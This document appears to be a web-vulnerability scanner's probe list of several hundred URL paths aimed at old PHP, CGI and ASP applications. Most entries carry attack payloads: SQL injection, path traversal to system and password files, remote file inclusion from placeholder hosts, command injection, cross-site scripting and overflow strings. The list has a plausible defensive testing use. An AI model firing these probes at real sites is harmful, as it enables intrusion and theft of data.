/include/msql.php?inc_dir=http://www.atker.com&ext=txt
/supporter/index.php?t=detailticket&id=root%20me
/supporter/index.php?t=editticket&id=got%20root
/supporter/index.php?t=updateticketlog&id=without%20me
/comment.php?mode=display&sid=foo&pid=;--injecthere&title=hoschi
/cgi-bin/admin/admin.cgi?Admin=ImageFolio
/cgi-bin/admin/setup.cgi
/setup.cgi?todo=debug
/ticket.php?id=545
/cgi-bin/CSNews.cgi
/CSNews.cgi
/cgi-bin/makebook.cgi
/cgi-bin/rwcgi60.exe?test&report=
/cgi-bin/rwcgi60.sh?test&report=
/cgi-bin/rwcgi60.cgi?test&report=
/cgi-bin/rwcgi60?test&report=
/dev60cgi/rwcgi60.exe?test&report=
/dev60cgi/rwcgi60.sh?test&report=
/dev60cgi/rwcgi60.cgi?test&report=
/dev60cgi/rwcgi60?test&report=
/demos?sql=select+*+from+Customers+as+Customer+FOR+ XML+auto&root=root&xsl=custtable.xsl&contenttype=text/html
/Nwind/Template/catalog.xml?contenttype=text/overvlowhere
/_head.php?_zb_path=http://thehost.net/a"
/board/_head.php?_zb_path=http://thehost.net/a"
/zboard/_head.php?_zb_path=http://thehost.net/a"
/zeroboard/_head.php?_zb_path=http://thehost.net/a"
/examples/jsp/view_source.jsp
/examples/jsp/source.jsp
/jsp/view_source.jsp
/view_source.jsp
/globals.php3?LangCookie=minetataa
/catalog/inludes/include_once.php?include_file=tataa
/install.php?phpbb_root_dir=myservertataa
/webMathematica/MSP?MSPStoreID=../../../../../etc/hosts&MSPStoreType=image/gif
/****cart/database/****cart.mdb
/database/****cart.mdb
/forum/admin/wwforum.mdb
/cgi-bin/webbbs/webbbs_config.pl?followup=|id|&name=100&[email protected]&subject=dd&bOdy=dlaö
/_login.jsp?login=’-- and pass=’--%00
/basilix.php
/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom& page=./../../../../../etc/hosts
/cgi-bin/update.dpgs
/update.dpgs
:8080/examples/basic/servlet/HelloServlet
:8080/examples/jsp/source.jsp
/cgi-bin/whois/whois.cgi
/cgi-bin/urlcount.cgi
/asgard/
/cgi-bin/faqmanager.cgi
/E-Guest_sign.pl
/cgi-bin/betsie/parserl.pl
/proplus/admin/login.php?action=insert&username=test&password=test
/horde/imp/login.php?1=1&imapuser=xss_script
/horde/turba/status.php
/horde/imp/mailbox.php?mailbox=/etc/hosts
/docmgmtout.php
/uploads/
/postbug.php
/anthill/postbug.php
/search?NS-query=tst&NS-query-pat=..\..\..\..\..\boot.ini
/scripts/Carello/Carello.dll
/content/base/build/explorer/none.php?/etc/
/cgi-bin/pbcgi.cgi?name=tistname&email=
/pbcgi.cgi?name=tistname&email=
/main/cafenews.php
/ext.dll
/ext.ini.%00.txt
/accounts/getuserdesc.asp
/accounts/updateuserdesc.asp
/function_foot_1.inc.php
/cgi-bin/webmail/login/xxxyyyzzz.authdaemon
:6422/iiwiznew.asp
:6422/iiaction.asp
/cgi-bin/rwcgi60/
/cgi-bin/rwcgi60/showenv
/hd/winnt/system32/cmd.exe?/c+echo+hello
:444/splashAdmin.php
/search.php?search=a’%20order%20by%20time%20desc% 3b%20qry
/search.php?search=a%’%20order%20by%20time%20de sc%3b%20qry
/MWS/HandleSearch.html?searchTarget=morethan990bytesove rflow
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAA<!--htmltags-->
/scripts/wsm.phtml?searchboxinputname=|unixcommand
:32000/mail/addressaction.html
:32000/mail/readmail.html?folder=inbox&get=1&id=something
/php-affiliate/details2.php
/details2.php
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows\sys tem.ini
/error/HTTP_NOT_FOUND.html.var
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin .ini
/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO
/cgi-bin/%5c%2e%2e%5cbin%5cfile.exe?dir
/tmp_view.php?file=/etc/hosts
/adm/admbrowse.php?down=1&cur=%2Fetc%2F&dest=hosts&rid=1&S=123
/shop/browse.asp
/shop/details.asp
/shop/showcat.asp/
/shop/users.asp*
/shop/cart.asp
/shop/newuser.asp
/browse.asp
/details.asp
/showcat.asp/
/users.asp*
/cart.asp
/newuser.asp
/settings
/list
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin .ini
/%2f%2e%2e%2fcgi-bin/
/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=anoth erhostfilewithcmd
/jsptest.jsp+
/jsptest.jsp\
/filemanager/source.php?../../../../etc/hosts
/rpc.cgi
/graphs.php?action=edit&vertical_label=$(/bin/ls)
/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
/cgi-bin/db4web_c/dbdirname//etc/hosts
/modsecurity.php?inc_prefix=obox/htmlheader.php
/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
:8080/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
/modules.php?name=News&file=article&sid=1234%20or%201=1
/users.php?DATA=phpcode&then->/news.php3
/scripts/Carello/Carello.dll?CARELLOCODE=postthing&VBEXE=thisisit
/index.php?pymembs=admin
/db/users.dat
/admin/credit_card_info.php
/admin/upload.php
/showhits.php3?rel_path=http://another/main_********.inc
/checklogin.php?cfgProgDir=http://another/interface.php
/ss_admin.asp?Mode=Update&Acton=Access&UserName=pommes&Password=frittes
/vbzoom/register.php
/VBZooM/add-subject.php?Success=1&FileName=localFile&FileName_size=500&FileName_name=remoteFile
/VBZooM/download/
/web/msgError.asp?Redirect=login.htm&Reason=thingss
/web/usermgr/userlist.asp
/phpBB/phpinfo.php
/cgi-bin2/MsmMask.exe?mask=/file.ext
/phprank/update.php?page=update&name=zok&description=zok&siteurl=zok&banurl=zok&bh=42&bw=42&email=zok&spass=zok&id=1033913918
:631/jobs
:2200/perl/env.pl
:2200/lcgi/lcgitest.nlm
:2200/se/SYS:/novonyx/suitespot/docs/sewse/misc/allfield.jse
:2200/nsn/env.bas
:2200/nsn/fdir.bas:ShowVulume
:2200/servlet/SessionServlet
:2200/servlet/ServletManager?user=servlet&password=manager
:2200/lcgi/ndsobj.nlm/170xA=overflow
:2200/lcgi/ndsobj.nlm/OP=170xA=overflow
:2200/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/console.log
:2200/nsn/..%5Cutil/slist.bas
:2200/nsn/..%5Cutil/dsbrowse.bas
:2200/nsn/..%5Cutil/dir.bas
:2200/nsn/Charx230=overflow
:2211/perl/
:2211/perl/env.pl
:2211/lcgi/lcgitest.nlm
:2211/se/SYS:/novonyx/suitespot/docs/sewse/misc/allfield.jse
:2211/nsn/env.bas
:2211/nsn/fdir.bas:ShowVulume
:2211/servlet/SessionServlet
:2211/servlet/ServletManager?user=servlet&password=manager
:2211/lcgi/ndsobj.nlm/170xA=overflow
:2211/lcgi/ndsobj.nlm/OP=170xA=overflow
:2211/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/console.log
:2211/nsn/..%5Cutil/slist.bas
:2211/nsn/..%5Cutil/dsbrowse.bas
:2211/nsn/..%5Cutil/dir.bas
:2211/nsn/Charx230=overflow
:2211/perl/
:5000/diffs/foo.c@’;echo%20>tst’?nav=index.html|src/|hist/foo.c
:5555/diffs/foo.c@’;echo%20>tst’?nav=index.html|src/|hist/foo.c
:32000/mail/admin/../include.html.
:32000/mail/admin/../settings.html.
/mail/admin/../include.html.
/mail/admin/../settings.html.
/ingenium/config/config.txt
/admin/index.shtml?sel=server
/admin/index.php?cookie_adminpub_value_1
/config/config.txt
/forums/avatar.php?img=../secret/connect.php
/avatar.php?img=../secret/connect.php
/phptonuke.php?filnavn=/etc/hosts
/nuke70/modules/MS_Analysis/mstrack.php
/nuke70/modules/MS_Analysis/title.php
/nuke71/admin.php?op=NukebookEditEntry&nbid=-2%20UNION%20SELECT%20null%20/*
/cgi-bin/virgil.cgi?tar=-lp&zielport=31337
/cgi-bin/virgil/virgil.cgi?tar=-lp&zielport=31337
/cgi-bin/a1disp3.cgi?/../../../../../../etc/hosts
/gb/index.php?login=true
/variables.php3?Include=http://badthing-french.inc
/templates/form_header.php?noticemsg=jsinject
/cgi-bin/mojo/mojo.cgi
/phpbb/admin/admin_ug_auth.php
/phpbb206c/admin/admin_words.php?mode=edit&id=1/*"><script>alert(****************);</script
/phpbb/admin/admin_words.php?mode=edit&id=1/*"><script>alert(****************);</script
/admin/admin_words.php?mode=edit&id=1/*"><script>alert(****************);</script
/board/admin/admin_ug_auth.php
/bb/admin/admin_ug_auth.php
/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=travers%00
/entete.php?subpath=http://badurl_banniere.php
/enteteacceuil.php?subpath=http://badurl_banniere.php
/topic/entete.php?subpath=http://badurl_banniere.php
/index.php?subpath=http://badurl_banniere.php
/newtopic.php?subpath=http://badurl_banniere.php
/prometheus-all/index.php?PROMETHEUS_LIBRARY_BASE=http://another_/autoload.lib/&PHP_AUTO_LOAD_LIB=0
/cgi-bin/ion-p.exe?page=c:\boot.ini
/cgi-bin/ion-p?page=../../../../../etc/hosts
/networking_utils.php
/cgi-bin/cutecast/members/test.user
/ezhttpbench.php?AnalyseSite=/etc/hosts&NumLoops=1
/src/read_bOdy.php?mailbox=scripting
/artlist.php?root_path=http://another/thatfile.php
/thatfile.php?root_path=http://host/config.php_and_messages.1.php
/cgi-bin/boozt/admin/index.cgi
/soinfo.php
/admin/phpinfo.php
/agentadmin.php?agentname=’%20OR%20’’=’&agentpassword=’%20OR%20’’=’
/news/include/customize.php?l=http://host/otherfile.php
/modules/WebChat/index.php
/https-admserv/bin/perl/importInfo?dir=/tmp
/phorum/viewtopic.php?id=some_shit&t_id=2
../../myServerEXEC-0.2/readme.txt
/admin/index.php?idsession=’%20OR%20’’=’
/mambo/administrator
/newsletter.php?action=1&waroot=http://otherhost_start_php/
/sql/db_type.php?waroot=http://anotherhost_start_php/
/cgi-bin/openwebmail-abook.pl?sessionid=test-session-0
/cgi-bin/openwebmail/userstat.pl
/cgi-bin/webmail?WEBTEMPLATE=a&MAILTEMPLATE=b&[email protected]&SUBJECT=test
/cartman.php?action=add&id=1001&descr=MS%20Office%202000&price=119&quantity=1
/a_security.htm
/modif/ident.php?id=validmemberidnumeric&pass=’%20OR%20’’=’
/modeles/haut.php?dirroot=http://badhost_with_lang_lang.php&SESSION=.
/nx/common/cds/menu.inc.php?c_path=otherhost_with__common_lib_lau nch.inc.php
/cgi-bin/webshell
/admin/system_footer.php
/html/chatheader.php?mainfile=anything&Default_Theme=xss_script
/html/partner.php?mainfile=anything&Default_Theme=xss_script
/admin_t/include/aff_liste_langue.php?rep_include=myhost_with_para_ langue.php
/admin_t/include/find_theni_home.php
/s8forumfolder/users/any_name.php?cmd=uname%20-a_mail_cmd_etc
/inc/dbase.php?prefix=myhost
/inc/config.php?prefix=myhost
/inc/common.load.php?prefix=myhost
/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=another_h ost
/library/lib.php
/library/editor/editor.php?root=myhost_library__editor__PropAcce_s tring.php
/imp/mailbox.php3?actionID=6&server=x&imapuser=x’;sqlthings
/webstore/admin/addcustomer.php
/jta20.jar
/applet.conf
/default.conf
/webstore/addcustomer.php
/addcustomer.php
/cgi-bin/smartsearch/smartsearch.cgi?keywords=cmdwithpipes
/upload.php
/administrator/upload.php
/administrator/gallery/uploadimage.php
/yabbse/
/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6 d19f2;action=post;threadid=1;title=Post+reply;quot e=-12)+UNION+SELECT+passwd*null*null*null*null*null*n ull*null*null+FROM+yabbse_members+where+ID_MEMBER= 1/*
/yabb/
/gaestebuch/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/guestbook/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/yabb/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/cgi-bin/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/yabbse/Reminder.php?searchtype=esearch&user=userA’%20or%20memberName=’userB
/current/index.php?site=demos&bn=../../../../../../../../../../etc/hosts%00
/current/modules.php?mod=fm&file=../../../../../../../../../../etc/hosts%00&bn=fm_d1
/cgi-bin/Users/default.users
/Users/default.users
/cgi-bin/bbmat/bbmat.pwd
/bbmat/bbmat.pwd
/wx/s.dll?d=/bootlog.txt
/typo3/
/typo3/quickstart/
/quickstart/
/cms/typo3conf/ext/
/cms/typo3/
/typo3/dev/translations.php
/cms/typo3/install/
/typo3/install/
/profiles.php?uid=scriptthings
/profile.php
/cgi-bin/update_profile.cgi
/dodo/cgi-bin/update_profile.cgi
/cgi-bin/psunami.cgi?action=board&board=1&topic=shellcmd
/privmsg.php
/accesscontrol.php
/protectedpage.php?uid=’%20OR%20’’=’&pwd=’%20OR%20’’=’
/modules/WebMail/mailattach.php?userfile=../../some.php&userfile_name=../attachments/file.txt&attachments=1
/TopSitesdirectory/help.php?sid=xssthings
/topsitesdirectory/edit.php?a=pre&submit=&sid=sql_injection--
/chgpwd.php?USERNAME=existing_user&PASSWORD=’%20OR%20’’=’
/admin/index.php?USERNAME=’%20OR%20’’=’&PASSWORD=’%20OR%201=1%20AND%20level=’1
/include/default_header.php
/include/options_form.php
/adminopts/login_form.php
/adminopts/include/ban_form.php
/adminopts/include/board_form.php
/adminopts/include/login_form.php
/adminopts/include/vip_form.php
/forum/include/default_header.php?script_path=http://host_with_-include-default_style.css
/includes/add.php
/room/save_item.php?name=wollo&ref=josef&photo=../inc/conf.php&photo_type=txt
/room/index.php?show=search&search=it_name&item=wollo
/support/messages
/topsitesdir/edit.php?a=pre&submit=&auth=1&sid=someid
/bin/common/search.pl
/yabbse/Sources/Packages.php?sourcedir=anotherhost_with_Packer.php
/search/results.stm?query=<script>alert(’X’);</script>
/zorum/include.php?gorumDir=anotherhost_with_group.php
/forum/include.php?gorumDir=anotherhost_with_group.php
/include.php?path=contact.php&contact_email=">xss_things
/search/results.stm
/servlet/psft.pt8.config.ConfigServlet
/servlet/psft.pt8.reader.ReaderServlet
/servlet/psft.pt8.gateway.GatewayServlet
/phplinks/include/email_confirmation.php?UserName=x&Email=x@target&site_title=test_&email_confirmation_2=Hello&owner_name=bu&owner_email=x@own
/cgi-bin/texis/vortex.log
/cgi-bin/texis/monitor.log
/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc%2 fhosts
/cgi-bin/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc%2 fhosts
/admin/WEB-INF\\classes/ContextAdmin.java\x00.jsp
/includes/header.php3?my_header=xyz
/includes/footer.php3?my_footer=yxz
/admin/exec.php3?cmd=syscmd
/hit.php?url_hit=anotherhost_with_config.php
/user/test.txt
/user/admin.txt
/cgi-sys/guestbook.cgi?user=cpanel&template=|pwd|
/admin/user_modif.php
/admin/admin_modif.php
/admin/admin_suppr.php
/sendphoto.php?album=..&***=config.inc.php
/sendphoto.php?album=..&***=config.inc.php&[email protected]&filled=1
/administrator/index2.php
/AdminHtml/parse_xml.cgi
/cutenews/shownews.php?cutepath=anotherhost_with_config.php_ or_news.txt
/cutenews/search.php?cutepath=anotherhost_with_config.php_or _news.txt
/cutenews/comments.php?cutepath=anotherhost_with_config.php_ or_news.txt
/plugins/3fax/1blocklists/index.php?plugin=anotherserver_with_things
/plugins/2administration/6departamentadmin/index.php
/plugins/2administration/5terminals/index.php
/plugins/2administration/4mailinglists/index.php
/plugins/2administration/3departaments/index.php
/plugins/2administration/2groupd/index.php
/include/help.php?base=anotherserver_with_include_common.in c
/in.php?id=any_word
/out.php?id=any_word
/top/in.php?id=any_word
/top/out.php?id=any_word
/topo/in.php?id=any_word
/topo/out.php?id=any_word
/mail/src/search.php
/mail/src/read_bOdy.php
/webmail/src/search.php
/webmail/src/read_bOdy.php
/src/search.php
/src/read_bOdy.php
/ipchat.php?root_path=anotherhost_with_conf_global. php
/billing/billing.swf
/billing/billing.apw
/logicworks/logicworks.ini
/logicworks.ini
/defines.php?WEBCHATPATH=anothersrvr_language_engli sh.php
/livredor/index.php?XSS
/compte.php?achat=1&valider=1&identifiant=’%20OR%20’’=’&password=’%20OR%20’’=’
/phpping/index.php?pingto=www.somewhere.org%20|%20dir
/cgi-bin/logbook/logbook.pl?file=cmdpipe
/cgi-bin/logbook.pl?file=cmdpipe
/logbook.pl?file=cmdpipe
/simplebbs/users/users.php
/fm.php
/texis.exe/?-version
/texis.exe/?-dump
/scripts/texis.exe/?-version
/scripts/texis.exe/?-dump
/cleartrust/ct_logon.asp?CTLoginErrorMsg=XSS
/k/home?dir=/&file=../../../../../../../../etc/hosts&lang=en
/sips/sipssys/users/
/sipssys/users/
/chat/!nicks.txt
/chat/admin.php3
/chat/admin.php
/chat/!pwds.txt
/checkout_payment.php?payment_error=cc&error=<script%20language=javascript>window.ale rt%28****************%29;</script>
/modules/mydownloads/viewcat.php
/modules/mylinks/brokenlink.php
/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=`
/viewpage.php?file=/etc/hosts
/myguestBk/admin/index.asp
/myguestBk/admin/delEnt.asp?id=avalidnewsnumber
/sysuser/docmgr/iecreate.stm?template=%2e%2e%2f
/sysuser/docmgr/ieedit.stm?url=%2e%2e%2f
/jgb_eng_php3/jgb.php3
/jgb_eng_php3/cfooter.php3
/scozbook/add.php
/scozbook/view.php?PG=notexisting
/cgi-bin/cc_guestbook.pl
/cgi-bin/cc_log.pl
/docman/new.php
/patch/index.php
/cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
/admin/script.php?data=_script_dot_php_with_php_source_in side
/modules/glossaire/glossaire-aff.php
/gb.asp
/news/news.mdb
/upnp/service/WANPPPConnection
/cgi-bin/webc.cgi
/cgi-bin/webc.cgi/g/
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD
/sources/functions.php?skinid=huhh
/forum/sources/functions.php?skinid=huhh
/forums/sources/functions.php?skinid=huhh
/gb_eintragen.asp
/gb/gb_eintragen.asp
/guestbook/gb_eintragen.asp
/gaestebuch/gb_eintragen.asp
/show_cart.inc.php
/store/show_cart.inc.php
/shop/show_cart.inc.php
/shop/stats.php
/store/stats.php
/stats.php
/cgi-bin/sgb/superguest.cgi
/cgi-bin/sgb/superguestconfig
/guestbook/admin/o12guest.mdb
/instaboard/index.cfm?frmid=1%20AND%20u.userid%20IN%20(select% 20userid%20from%20users)
/guestbook/new_entry.asp
/gaestebuch/new_entry.asp
/settings/site.ini
/kernel/classes/ezrole.php
/kernel/classes/ezsearch.php
/kernel/classes/ezsearchlog.php
/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C
/Program%20Files/BadBlue/PE/ext.ini
/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
/guestbook/database/mpcsoftweb_guestdata.mdb
/guest/database/mpcsoftweb_guestdata.mdb
/isapi/count.pl
/xmb/member.php
/cgi-bin/readfile.tcl?file=/etc/master.passwd
/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
/cgi-bin/album.pl?full=1
/openbb/board.php?
/board.php?
/WebAdmin.dll?Session=X&Program=MDaemon&Directory:Name=C:\WINNT&File:Name=WIN.INI&View=ViewFile
/ideabox/include.php?gorumDir=anotherhost_with_notification .php
/biztalkhttpreceive.dll?Ax265
/biztalktracking/rawdocdata.asp?nDocumentKey=1*@tnDirection=1;exec master.dbo.xp_cmdshell ’dir’--
/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1*@tnDirecti on=1;exec master.dbo.xp_cmdshell ’dir’--
/Scripts/SLwebmail/GlobalLogin.dll?CompanyID=BOF
/Scripts/SLwebmail/recman.dll?CompanyID=BOF
/Scripts/SLwebmail/GlobalLogin.dll?CompanyID=BOF
/Scripts/SLwebmail/admin.dll?CompanyID=BOF
/Scripts/SLwebmail/showlogin.dll?Language=BOF
/Scripts/SLwebmail/ShowGodLog.dll?FILE=c:%5c%5cBOOT.INI
/Scripts/SLwebmail/WebMailReq.dll?pathdisclosure
/shop/normal_html.cgi?file=|id|
/shop/member_html.cgi
/yabbse/ssi.php?sourcedir=otherhost_with_Errors_php
/ttforum/index.php?action=news;board=1;template=another_ser ver;ext=help
/modules/forum/src/Profile.php
/src/Profile.php
/shop/normal_html.cgi?file=../../../../../../etc/hosts%00
/forum/register.asp??mode=DoIt&Email=’%20exec%20master..xp_cmdshell%20’dir’%20--&Name=snitz
/phorum/download.php
/phorum/register.php
/intranet/browse.php?loginname=whocares&parent=1&expand=1&order=creatorid&sortposted=ASC
/owl/browse.php?loginname=whocares&parent=1&expand=1&order=creatorid&sortposted=ASC
/forum/private.php
/autohtml.php?op=modload&mainfile=x&name=badfilething
/poster/mem.php
/zboard/mem.php
/supporter/tupdate.php?groupid=change&sg=groupid*description=char(97*98*99*100)&id=10
/internal.sws?../../windows/system.ini
/admin/templates/header.php?admin_root=anotherserverwith_templates/header.inc.php&cookie_ttcms_user_admin=1
/xmbforum/member.php
/board/admin_pass.php
/admin_pass.php
/textportal/admin_pass.php
/admin/objects.inc.php4?Server[path]=anothersrv&Server[language_file]=cmd.php4
/board/index.php?action=imprefs_ttforum_ttcms
/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr’;exec%20master..xp_cmdshell’p ing%2010.10.10.11’;--
/ext.dll?mfcisapicommand=loadpage&page=admin.ats&a0=add&a1=root&a2=%5C
/syslog.htm
/vgn/ac/edit
/vgn/ac/index
/vgn/vr/Editing
/vgn/vr/Select
/vgn/legacy/edit
/vgn/ppstats
/vgn/login?errInfo="%2b%20****************%20%2b"
/vgn/style
/vgn/legacy/save?needs_vgn_creds_Cookie
/board/index.php?needs_php_code_in_User-Agent
/news/p-news.php
//admin/admin.shtml
/bandwidth/index.cgi?action=showmonth&year=_xss_
/shoutbox.php?conf=../../../../../../../etc/hosts
/board/philboard_admin.asp?with_cookie_philboard_admin=Tr ue
/database/philboard.mdb
/forum/database/philboard.mdb
/psynch/nph-psa.exe?lang=
/psynch/nph-psf.exe?lang=
/psynch/nph-psf.exe?css=">_some_XSS
/psynch/nph-psa.exe?css=">_some_XSS
/psynch/nph-psf.exe?css=site_with_file
/psynch/nph-psa.exe?css=site_with_file
/b2-tools/gm-2-b2.php?b2inc=ahostwith_b2functions.php
/zentrack/index.php?configFile=/../../../../../etc/hosts
/manage/login.asp?User=admin&Pass=’+or+’1’=’1
/browse_item_details.asp?Item_ID=sql_injection
/cgi-bin/imagefolio/admin/admin.cgi?cgi=remove.pl&uid=111.111.111.111&rmstep=2&category=../../../../../../../../../../../etc/
/admin/upload.htm
/admin/upload.asp
/upload.asp
/database/db2000.mdb
/b2-include/b2functions.php?b2inc=anotherhostwith_lj_update.ph p
/blog.header.php?posts=sql_inj
/blog.cgi?submit=ViewFile&month=01&year=2004&file=|id|
/blog/blog.cgi?submit=ViewFile&month=01&year=2004&file=|id|
/b2-include/b2menutop.php?b2inc=anotherhostwith_b2menutop.txt
/user/
/user/admin.txt
/info.dat
/servlet/psoft.hsphere.CP/
/pm/lib.inc.php?pm_path=anothewrhost_with_config.txt&sfx=.txt
/phpBB2/viewtopic.php?sid=1&topic_id=-1&view=newest
/tutos/file/file_select.php?msg=xss_code
/tutos/file/file_new.php?link_id=1065&fileupload_possible_file_in_tutos_repository_numbe r_filenumber_FILE
/XMBforum/member.php?action=viewpro&member=admin<script>alert(’x’)<%2fscript>
/XMBforum/buddy.php?action=<script>alert(’x’)</script>&buddy=<script>alert(’XSS’)</script>
/phpBB/viewtopic.php?topic_id=xss_things
/WebAdmin.dll?View=Logon_and_User_POSTVARoverflow
/photorate/new.php
/pafiledb/includes/team/file.php?fileupl_possib
/pafiledb/pafiledb.php
/moregroupware/modules/contact/index.php
/moregroupware/modules/
/scripts/nsiislog.dll?
/filemanager/index.php3?action=telecharger&fichier=/etc/hosts
/filemanager/index.php?action=telecharger&fichier=/etc/hosts
/cgi-bin/forum/config.pl?form=0
/cgi-bin/forum/webbbs_config.pl?
/megabook/admin.cgi?default_pass_is_megabook
/megabook/files/20/setup.db
/eshop/10Expand.asp?ProductCode=’
/eshop/20Review.asp?ProductCode=’
/addressbook/index.php?xssthings
/shopexd.asp?catalogid=sql_inject
/store/shopexd.asp?catalogid=sql_inject
/shop/shopexd.asp?catalogid=sql_inject
/shopping/shopexd.asp?catalogid=sql_inject
/productcart/pc/Custvb.asp?redirectUrl=&Email=’+having+1%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit
/produccart/pcadmin/login.asp?idadmin=’+or+1=1--+
/_vti_bin/fpcount.exe/
/w-agora/index.php
/wagora/index.php
/forum/download_forum.php
/forums/download_forum.php
/board/ssi.php
/forum/ssi.php
/forums/ssi.php
/forum/sm_install.php
/forums/sm_install.php
/ProductCart/pc/msg.asp?message=xssthings
/news51/newsdata/data/user.idx
/forum51/forumdata/data/user.idx
/board51/boarddata/data/user.idx
/news/newsdata/data/user.idx
/forum/forumdata/data/user.idx
/board/boarddata/data/user.idx
/qshop/admin/
/qshop/admin/upload.htm
/admin/data_passwd.dat
/forum/mainfile.php?MAIN_PATH=anotherhost_with_config.php
/view.tmpl?testfile=filewithdirtrav
/question/crm/download.php?filename=../../../../../../../../../../../../etc/hosts
/download.php?filename=../../../../../../../../../../../../etc/hosts
/crm/download.php?filename=../../../../../../../../../../../../etc/hosts
/etc/****dot.conf
/****dot/index.pl
/blackbook/index.php
/blackbook/data/data.dat
/cgi-bin/search.cgi?ul=BOF6000ortmpl=xxx
/htmltonuke.php?filnavn=xssthings%20example.html
/Data/settings.xml
/store/sfError.asp?sfid=20212&reason=xssscripts
/elitenews/stats.php
/elitenews/login.html
/admin/settings.inc.php
/admin/login.asp?pass=1st&user=sqlinject
/eventcal2.php.php?path_simpnews=anotherhostwith_co nfig.php
/eventscroller.php?path_simpnews=anotherwith_config .php
/node/view/666
/atomicboard/index.php?********=../../../../../../etc/hosts
/AtomicBoard-0.6.2/index.php?********=anything
/webcalendar/
/ashweb/ashnews.php?pathtoashnews=remotehost_with_ashproje cts_newsconfig.php
/ashnews.php?pathtoashnews=remotehost_with_ashproje cts_newsconfig.php
/do_subscribe?showuser=BOFx?
/add_acl?folder=~BOFx@localhost/INBOX&add_name=lucas
/do_map?action=new&oldalias=eso&alias=**********alert(****************);</script>&folder=public&user=lucascavadora
:8099/admin/tasks.asp
/admin/tasks.asp
:8099/admin/users/users.asp
/admin/users/users.asp
:8099/admin/default.asp
/admin/default.asp
:8099/users/user_setpassword.asp
/users/user_setpassword.asp
/html/jsp/fnd/aoljtest.jsp
/exchange/root.asp?acs=anon
/guestbook/guestbookdat
/guestbook/pwd
/Admin.po?proceed=yes
/guestbook/admin.php
/fndwrr.exe
/fndwrr
/hp/device/this.LCDispatcher
/admin/db.php
/moregroupware/modules/webmail2/index.php
/moregroupware/modules/webmail2/inc/
/pbl/index.php
/nphp/nphpd.php?nphp_config[LangFile]=/etc/hosts
/pass_done.php?Submit=1&email=’%20OR%203%20IN%20(1*2*3)%20INTO%20OUTFILE%2 0’/tmp/file.txt
/shopping/shopexd.asp
/shop/shopexd.asp
/shopexd.asp
/guestbook/sign.asp
/jongeren/Gastenboek/sign.asp
/cgi-bin/sbcgi/sitebuilder.cgi
/webcalendar/colors.php?color=xssthings
/cgi-bin/esp?PAGE=xssthings
/gallery/displayCategory.php?basepath=http://anotherhost_with_imageFunctions.php
/gallery/displayCategory.php?adminpath=http://anotherhost_with_fileFunctions.php
/mailattach.php?submit=1&attach1=admin/original/config.php&attach1_name=../DBInfos.txt
/docs/NED?action=retrieve&********=http://www.nokia.com
/auth.inc.php?admin=sql_things_base64_encoded
/cgi-bin/math_sum.mscgi?a=BOV_87_chars
/mambo/banners.php?op=click&bid=100%2f*+
/powerslave*id*10;*nodeid**_language*uk.html
/cgi-bin/utm/admin?cmd=full_view&sid=q“%20OR%201=1%20OR%20“q“=“q
/cgi-bin/utm/utm_stat?cmd=user_report&sid=q“%20OR%201=1%20OR%20“q“=“q
/cgi-bin/utm/utm_stat?cmd=change_lang&lang=ru“*%20bill=10000*%20lang=“ru&sid=validSID
/exec/MsmSetup.exe?tst
/public/exec/MsmSetup.exe?tst
/cgi-bin/MsmSetup.exe?tst
/cgi-bin/MsmFind.exe
/images/?pattern=/*&sort=name
/debug/echo?name=**********alert(’hello’);</script>
/debug/dbg?host=**********alert(’hello’);</script>
/debug/showproc?proc=**********alert(’hello’);</script>
/debug/errorInfo?title=**********alert(’hello’);</script>
/thread/search.asp
/thread/default.asp?orderby=Author
/cboard/cboard.asp?cbid=1
/cboard/post.asp?cbid=1
/rbdforum-standalone/login.asp
/rbdforum/login.asp
/mail/m602cl3w.exe?A=GetFile&U=9&DL=0&FN=../../../boot.ini
/admin/header.php?voir=1&skinfile=skin/../../../etc/hosts
